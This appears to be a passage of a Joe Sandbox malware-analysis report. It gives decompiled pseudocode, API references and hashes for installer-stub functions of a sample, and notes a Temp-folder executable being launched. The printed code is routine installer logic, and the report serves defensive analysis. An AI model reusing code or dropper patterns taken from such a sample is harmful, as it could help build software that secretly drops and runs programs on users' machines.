								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                    0x00402950
                    0x00402952
                    0x00402957
                    0x0040295c
                    0x0040295f
                    0x00402969
                    0x0040296d
                    0x0040296d
                    0x00402973
                    0x00402980
                    0x00402988
                    0x0040298b
                    0x00402997
                    0x0040299a
                    0x004029a0
                    0x004029ae
                    0x004029b3
                    0x004029b7
                    0x004029ba
                    0x004029c3
                    0x004029cf
                    0x004029d3
                    0x004029d6
                    0x004029e0
                    0x004029ff
                    0x004029e7
                    0x004029ec
                    0x004029f4
                    0x004029f7
                    0x004029fc
                    0x004029fc
                    0x00402a06
                    0x00402a06
                    0x00402a13
                    0x00402a19
                    0x00402a1f
                    0x00402a1f
                    0x004029b7
                    0x00402a33
                    0x00402a35
                    0x00402a35
                    0x00402a3f
                    0x00402a40
                    0x00402a44
                    0x00402a48
                    0x00402a4e
                    0x00402a4e
                    0x00402a55
                    0x004022f1
                    0x00402c2d
                    0x00402c39

                    APIs
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                    • GlobalFree.KERNEL32 ref: 00402A06
                    • GlobalFree.KERNEL32 ref: 00402A19
                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                    • String ID:
                    • API String ID: 2667972263-0
                    • Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                    • Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
                    • Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                    • Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 48%
                    			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A3B(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                    0x00402eb4
                    0x00402ebd
                    0x00402ec6
                    0x00402ed2
                    0x00402edb
                    0x00402ee5
                    0x00402f0a
                    0x00402f10
                    0x00402f15
                    0x00402f16
                    0x00402f46
                    0x00402f1f
                    0x00402f21
                    0x00402f71
                    0x00402f74
                    0x00000000
                    0x00402f7a
                    0x00402f30
                    0x00402f35
                    0x00402f37
                    0x00000000
                    0x00000000
                    0x00402f3f
                    0x00402f44
                    0x00402f45
                    0x00402f45
                    0x00402f52
                    0x00402f5a
                    0x00402f61
                    0x00000000
                    0x00402f8a
                    0x00000000
                    0x00402f69
                    0x00402ef5
                    0x00402f08
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402f08
                    0x00402f90

                    APIs
                    • RegEnumValueW.ADVAPI32 ref: 00402EFD
                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CloseEnum$DeleteValue
                    • String ID:
                    • API String ID: 1354259210-0
                    • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                    • Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
                    • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                    • Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                    0x00401d81
                    0x00401d85
                    0x00401d9a
                    0x00401d87
                    0x00401d89
                    0x00401d8f
                    0x00401d8f
                    0x00401da0
                    0x00401da3
                    0x00401dad
                    0x00401db0
                    0x00401db8
                    0x00401dc9
                    0x00401dcc
                    0x00401dd7
                    0x00401dce
                    0x00401dd0
                    0x00401dd0
                    0x00401ddb
                    0x00401de5
                    0x00401e0c
                    0x00401e1b
                    0x00401e29
                    0x00401e31
                    0x00401e39
                    0x00401e39
                    0x00401e42
                    0x00401e48
                    0x00402ba4
                    0x00402ba4
                    0x00402c2d
                    0x00402c39

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                    • String ID:
                    • API String ID: 1849352358-0
                    • Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                    • Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
                    • Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                    • Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                    Download Yara Rule
                    C-Code - Quality: 73%
                    			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065B5();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                    0x00401e4e
                    0x00401e59
                    0x00401e5b
                    0x00401e68
                    0x00401e7f
                    0x00401e84
                    0x00401e91
                    0x00401e96
                    0x00401e9a
                    0x00401ea5
                    0x00401eac
                    0x00401ebe
                    0x00401ec4
                    0x00401ec9
                    0x00401ed3
                    0x00402638
                    0x0040156d
                    0x00402ba4
                    0x00402c2d
                    0x00402c39

                    APIs
                    • GetDC.USER32(?), ref: 00401E51
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                    • ReleaseDC.USER32 ref: 00401E84
                      • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                      • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                    • String ID:
                    • API String ID: 2584051700-0
                    • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                    • Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
                    • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                    • Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 59%
                    			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                    0x00401c43
                    0x00401c45
                    0x00401c4c
                    0x00401c4f
                    0x00401c52
                    0x00401c5c
                    0x00401c60
                    0x00401c63
                    0x00401c6c
                    0x00401c6c
                    0x00401c6f
                    0x00401c73
                    0x00401c7c
                    0x00401c7c
                    0x00401c7f
                    0x00401c83
                    0x00401c85
                    0x00401cda
                    0x00401cdc
                    0x00401ce7
                    0x00401cf1
                    0x00401cf4
                    0x00401cf4
                    0x00401cfd
                    0x00000000
                    0x00401c87
                    0x00401c8e
                    0x00401c90
                    0x00401c93
                    0x00401c99
                    0x00401ca0
                    0x00401ca3
                    0x00401ccb
                    0x00401d03
                    0x00401d03
                    0x00401ca5
                    0x00401cb3
                    0x00401cbb
                    0x00401cbe
                    0x00401cbe
                    0x00401ca3
                    0x00401d06
                    0x00401d09
                    0x00401d0f
                    0x00402ba4
                    0x00402ba4
                    0x00402c2d
                    0x00402c39

                    APIs
                    • SendMessageTimeoutW.USER32 ref: 00401CB3
                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend$Timeout
                    • String ID: !
                    • API String ID: 1777923405-2657877971
                    • Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                    • Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
                    • Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                    • Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404E77 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
			}



















                    0x00404e80
                    0x00404e85
                    0x00404e8d
                    0x00404e8e
                    0x00404e9b
                    0x00404ea3
                    0x00404ea4
                    0x00404ea6
                    0x00404ea8
                    0x00404eaa
                    0x00404ead
                    0x00404ead
                    0x00404eb4
                    0x00404eba
                    0x00404eba
                    0x00404ec1
                    0x00404ec8
                    0x00404ecb
                    0x00404ece
                    0x00404ece
                    0x00404ed2
                    0x00404ee2
                    0x00404ee4
                    0x00404ee7
                    0x00404e90
                    0x00404e90
                    0x00404e97
                    0x00404e97
                    0x00404eef
                    0x00404efa
                    0x00404f10
                    0x00404f21
                    0x00404f3d

                    APIs
                    • lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                    • wsprintfW.USER32 ref: 00404F21
                    • SetDlgItemTextW.USER32 ref: 00404F34
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: ItemTextlstrlenwsprintf
                    • String ID: %u.%u%s%s
                    • API String ID: 3540041739-3551169577
                    • Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                    • Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
                    • Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                    • Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405F3D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E00405F3D(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                    0x00405f3e
                    0x00405f4b
                    0x00405f4c
                    0x00405f57
                    0x00405f5f
                    0x00405f5f
                    0x00405f67

                    APIs
                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F4D
